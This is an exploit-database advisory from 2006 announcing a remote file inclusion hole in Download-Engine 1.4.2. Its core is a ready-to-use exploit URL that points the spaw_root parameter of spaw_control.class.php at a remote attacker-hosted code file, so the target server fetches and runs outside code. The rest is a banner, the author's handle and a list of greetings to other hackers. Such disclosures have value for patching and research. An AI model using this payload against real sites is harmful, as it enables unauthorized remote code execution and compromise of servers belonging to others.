id: 964
date: 10/11/2006
title: Download-Engine <= 1.4.2 (spaw) Remote File Include Vulnerability
author: v1per-haCker
cves: 

=================================================================
Download-Engine <= 1.4.2 (spaw) Remote File Include Vulnerability
=================================================================



#======================================================================================#
#  Download-Engine Remote File Include                                       		#
#======================================================================================#
# Info:-										#
#											#
# Scripts: Download-Engine								#
# Version : 1.4.2									#
# Dork & vuln : download scripts and think :)						#
# Note : only this version effcted :)							#
#======================================================================================#
#Exploit :										#
#											#
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_root=http://EvElCoDe.txt?			 
#											#
#======================================================================================#
#Discoverd By : v1per-haCker								#
#											#
#											#
#XP10_hackEr Team									#
#											#
#Greetz to : 										#
#abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |  ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net | metoovet




#  0day.today [2023-03-23]  #